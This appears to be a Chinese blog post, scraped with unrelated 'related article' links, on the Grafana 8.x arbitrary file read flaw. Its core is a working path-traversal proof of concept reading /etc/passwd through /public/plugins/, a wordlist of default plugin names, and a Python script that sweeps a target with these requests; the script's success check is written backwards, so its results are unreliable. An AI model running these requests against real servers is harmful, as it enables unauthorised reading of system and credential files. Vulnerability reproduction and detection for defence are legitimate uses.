程序员经验分享-hwhale

Grafana任意文件读取

2023-10-27

Grafana任意文件读取

漏洞描述

Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件

影响版本

Grafana 8.x

漏洞复现

POC

HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd

paload.txt

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

image-20211208152159118

检测脚本

import requests
import sys
 
args = str(sys.argv[1])
f = open("./paload.txt")
for line in f:
    url = "http://"+args+"/public/plugins/"+str.rstrip(line)+"/../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    }
    req = requests.post(url, headers=headers,timeout=(3,7),allow_redirects=False)
    a=req.text
    str1='root'
    if a in str1:
        print('确认存在'+str.rstrip(line)+'路径,并存在漏洞!')
        print(url)
    else:
        print('不存在漏洞!')

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

安全

web安全

服务器

Grafana任意文件读取 的相关文章

  • 服务器集群是如何提高计算性能的?

    服务器集群是一种将多台服务器连接起来协同工作的技术 通过集群配置 可以提高计算性能 可靠性和可扩展性 以下是服务器集群如何提高计算性能的详细解释 一 并行处理能力 服务器集群的核心优势在于其并行处理能力 通过将多个服务器组成一个集群 可以将

  • centos系统有什么好处?

    CentOS是一种基于开源代码的Linux操作系统 它有以下几个优势 1 稳定性 CentOS是一种非常稳定的操作系统 它的代码经过了严格的测试和审查 因此它非常适合作为服务器操作系统使 用 2 安全性 由于CentOS是基于开源代码的操作

  • 信号浪涌保护器的原理和行业应用方案

    信号浪涌保护器 Surge Protective Device 简称SPD 是一种用于限制信号线路中瞬态过电压和分泄浪涌电流的防雷装置 主要用于保护各类信号线路及设备的防雷安全 信号浪涌保护器的原理是利用气体放电管 压敏电阻 齐纳二极管等非

  • 5个步骤,教你瞬间明白线程和线程安全

    记得今年3月份刚来杭州面试的时候 有一家公司的技术总监问了我这样一个问题 你来说说有哪些线程安全的类 我心里一想 这我早都背好了 稀里哗啦说了一大堆 他又接着问 那你再来说说什么是线程安全 然后我就GG了 说真的 我们整天说线程安全 但是对

  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受

  • messages,CentOS 7不收集日志或不存在 /var/log/messages

    var log message var log secure等都不记录了 并且都是空文件 重启机器 reboot 无效 重启日志 systemctl start rsyslog 无效 怀疑空间不足 删除 var log messages 重

  • 2024年金三银四网络安全考试试题

    2023年金三银四网络安全考试试题 1 关于数据使用说法错误的是 A 在知识分享 案例中如涉及客户网络数据 应取敏感化 不得直接使用 B 在公开场合 公共媒体等谈论 传播或发布客户网络中的数据 需获得客户书面授权或取敏感化 公开渠道获得的除

  • Jmeter 性能-并发量计算

    并发概念 指网站在同一时间访问的人数 人数越大瞬间带宽要求更高 服务器并发量分为 业务并发用户数 最大并发访问数 系统用户数 同时在线用户数 估算业务并发量的公式 C nL T C C 3 C的平方根 说明 C是平均的业务并发用户数 n是l

  • 「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握

    1 什么是 CSRF 面试的时候的著名问题 谈一谈你对 CSRF 与 SSRF 区别的看法 这个问题 如果我们用非常通俗的语言讲的话 CSRF 更像是钓鱼的举动 是用户攻击用户的 而对于 SSRF 来说 是由服务器发出请求 用户 日 服务器

  • 【网安神器篇】——WPScan漏洞扫描工具

    目录 一 Wordpress简介 二 WPScan介绍 三 安装 四 获取token 1 注册账号 2 拿到token 五 使用教程 1 常用选项 2 组合命令 1 模糊扫描 2 指定扫描用户 3 插件漏洞扫描 4 主题漏洞扫描 5 Tim

  • 你的服务器还安全吗?用户数据是否面临泄露风险?

    一系列严重的网络安全事件引起了广泛关注 多家知名公司的服务器遭到黑客挟持 用户的个人数据和敏感信息面临泄露的风险 这些事件揭示了网络安全的脆弱性和黑客攻击的威胁性 提醒着企业和个人加强对网络安全的重视 一 入侵案例 1 1 蔚来数据泄露 1

  • 全网最全(黑客)网络安全自学路线!熬夜两周整理(巨详细)

    学网络安全有什么好处 1 可以学习计算机方面的知识 在正式学习网络安全之前是一定要学习计算机基础知识的 只要把网络安全认真的学透了 那么计算机基础知识是没有任何问题的 操作系统 网络架构 网站容器 数据库 前端后端等等 可以说不想成为计算机

  • 【无标题】

    大家都知道该赛项的规程和样题向来都是模棱两可 从来不说具体的内容 导致选手在备赛时没有头绪 不知道该怎么训练 到了赛时发现题目和备赛的时候完全不一样 那么本文将以往年信息安全管理与评估赛项经验来解读今年2023年国赛的规程 帮助选手们指明方

  • ESP10B 锁定连接器

    ESP10B 锁定连接器 ESP10B 电机新增内容包括双极型号标准 NEMA 尺寸 17 23 和 34 的步进电机现在包括输出扭矩范围从 61 盎司英寸到 1291 盎司英寸的双极型号 该电机配有带锁定连接器的尾缆 可轻松连接 每转可步

  • 光波导结构

    摘要 增强现实和混合现实 AR MR 领域的新应用引起了人们对带有光栅区域的光波导系统的越来越多的关注 这些光波导系统用于输入和输出耦合以及扩瞳目的 VirtualLab Fusion为这类系统的仿真和设计提供了几个强大的工具 其中一个是具

  • 【安全】mybatis中#{}和${}导致sql注入问题及解决办法

    0 问题 使用mybatis的时候遇到了 和 可能导致sql注入的问题 1 预先了解 1 底层通过prepareStatement对当前传入的sql进行了预编译 一个 被解析为一个参数占位符 解析之后会将String类型的数据自动加上引号

  • 【安全】Java幂等性校验解决重复点击(6种实现方式)

    目录 一 简介 1 1 什么是幂等 1 2 为什么需要幂等性 1 3 接口超时 应该如何处理 1 4 幂等性对系统的影响 二 Restful API 接口的幂等性 三 实现方式 3 1 数据库层面 主键 唯一索引冲突 3 2 数据库层面 乐

  • 2023下半年软考「单独划线」合格标准公布

    中国计算机技术职业资格网发布了 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告 2023下半年软考单独划线地区合格标准各科目均为42分 01 官方通告 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告

  • 网工内推 | 上市公司同程、科达,五险一金,年终奖,最高12k*15薪

    01 同程旅行 招聘岗位 网络工程师 职责描述 1 负责职场 门店网络规划 建设 维护 2 负责网络安全及访问控制 上网行为管理和VPN设备的日常运维 3 负责内部相关网络自动化和系统化建设 4 优化与提升网络运行质量 制定应急预案 人员培

  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • 开发中RO,VO,DO,DTO,PO, BO, TO, CO, AO, SO的区别

    随着软件开发的不断发展 越来越多的概念被引入到开发中 其中就包括了RO VO DO DTO PO BO TO CO AO SO等概念 这些概念都是为了更好地组织代码 提高代码的可读性和可维护性而设计的 RO Resource Object

  • 127-Linux_Redis

    文章目录 一 Redis的基本概念 1什么是redis 2redis的特性 1 内存存储 2 数据持久化 3 多种数据结构 4 原子性操作 5 发布 订阅模型 6 高可用性 7 高并发性 二 Redis的数据结构 1 字符串 string

  • 关于程序间通信的两点应用

    由于ios程序本身采用沙盒结构 比较封闭 各个app间是比较独立的 但是ios还提供了一些app间通信的接口 可以利用这些接口 做些东西 1 判断系统里是否安装了某个app 比如新浪微博应用注册了URL scheme为 weibo 我们可以

  • 计算机编码规则

    英文 中文 解释 使用场景 bit 比特 一个位就代表一个0或1 即二进制 数据传输时以bit为单位 byte 字节 一个字节代表8位bit 2的8次方位 数据储存都是以byte位单位 字符 一个字符占几个字节由下面的编码方式决定 一个字符

  • Ant design pro-项目探究(7)react的markdown编辑器

    前言 普通的input和textarea已满足大部分的文本记录 但想要让输入文本更加多样化 markdown编辑器可谓是yyds 但是vue版本的markdown编辑器众多 基于react版本的编辑器就相当少一些 以下是整合和探究react

  • DNS术语中的CNAME、A、MX、TTL名词解释

    什么是域名解析 域名解析就是域名到IP地址的转换过程 IP地址是网路上标识您站点的数字地址 为了简单好记 采用域名来代替ip地址标识站点地址 域名的解析工作由DNS服务器完成 什么是A记录 A Address 记录是用来指定主机名 或域名

  • ffmpeg入门篇-滤镜的基本使用

    转发自白狼栈 查看原文 滤镜 什么是滤镜 百度百科介绍说 滤镜主要是用来实现图像的各种特殊效果 我们最早在ffmpeg是如何转码的一文中了解过滤镜 来回顾下当时的转码流程图 从图中可以看到滤镜前后画的是虚线 表示可有可无 在术语中 滤镜指的

  • 荣耀平板5可以升级鸿蒙系统吗,荣耀平板也要升级至鸿蒙系统了 今年Q4开始

    6 月 3 号消息 在 HarmonyOS 2 发布后 即将升级机型名单也正式来临 不仅仅是是华为相关设备 荣耀也有一些设备将要升级至鸿蒙系统 除了荣耀手机之外 荣耀平板也将升级为鸿蒙系统 在今年第四季度荣耀平板 6 荣耀平板 X6 两款平

  • 安装使用LangChain时的报错解决

    刚刚装了LangChain但是引入各种包都报错 原因貌似为 Python3 7 不支持 LangChain 需要开启一个新的Python3 10环境 再重新安装即可正常运行 创建新的python环境 conda create n new e

  • js 遍历数组取出字符串用逗号拼接

    var arr name abc name def function getTextByJs var str for let item of arr str arr name 去掉最后一个逗号 如果不需要去掉 就不用写 if str len

  • linux查询CPU信息几种方式

    CPU架构 CPU架构主要包括 amd64 arm32v7 arm64v8 mips64el mips32 ppc64le和ppc32等架构 CPU信息 CPU信息主要为中央处理器详细信息 包括 架构 核心数量 处理速度 厂商名称 CPU主

  • db2分页查询sql语句_08-Mybatis Plus分页及自定义SQL语句

    1 数据库的连接配置 首先我们要配置数据的连接等相关信息 因此我们需要在application properties文件中 增加如下定义 spring application name server page helperserver po

  • springboot如何区分测试环境、生产环境。分环境启动

    一 通过Maven打包时 将不同环境文件打入jar包来区分环境 然后直接启动jar包即可 1 pom xml文件project标签里面加入以下配置 环境关键字可以根据自己的习惯来改

  • C#基础代码笔记(二)

    文章目录 for循环嵌套 1 构造乘法表 2 构造加法表 循环练习 1 计算年龄平均值 2 登录账户 3 连加计算 4 计算百内质数 5 随机数 枚举 枚举类型格式 强制转换枚举类型 结构体 结构体与枚举类型混用 结构体练习 1 混合颜色调

  • 填充阴影线(45°细线、剖面线)——Visio制图总结(五)

    本文旨在解决图形填充阴影线问题 机械制图中又称剖面线 用以表示物体剖开的面 填充线条的差异表征了材质的不同 效果图 实现步骤 1 选中封闭的图形 比如矩形 线段围成的图形需封闭 右键打开设置形状格式 2 找到设置形状格式中的填充面板 在模式

  • 线程池必须是单例模式

    线程池一定要在合理的单例模式下才有效 工作中我发现有些同学将线程池的创建方法放在services方法里面去创建线程池 这是不可以的 因为每当这个方法被调用的时候不是创建多少个线程的问题了 而是创建出来了一大堆线程池

  • Redis键值类型<key value> 以及键的使用注意事项

    Redis的常用键值对 Redis的键值对 Redis是以键值 Key Value 为基础 支持不同类型值 value 的数据结构服务器 在传统键值存储中 一般将字符串键与字符串值相关联 而在Redis中 该值不仅限于简单的字符串 还可以容

  • web前端技术笔记(八)屏幕适配、移动端布局

    屏幕适配 移动端与PC端页面布局区别 视口 视网膜屏幕 retina屏幕 清晰度解决方案 适配布局类型 PC及移动端页面适配方法 流体布局 响应式布局 基于rem的布局 流体布局案例 不常用 rem布局案例 CSS3 浏览器前缀 浏览器样式

  • 【mysql+tableau实战】电商用户行为数据分析

    正文共3289字 今年2月做的项目 为了求职又梳理了一遍 希望能进一步提升自己的数据分析思维 博客名字改失败了 得4月中旬才能修改 cry 目录 一 前期准备 一 数据集下载 二 软件下载 1 kettle 2 mysql8 0 3 tab

  • Grafana任意文件读取

    Grafana任意文件读取 漏洞描述 Grafana存在任意文件读取漏洞 通过默认存在的插件 可构造特殊的请求包读取服务器任意文件 影响版本 Grafana 8 x 漏洞复现 POC HTTP XXX XXX XXX XXX public

热门标签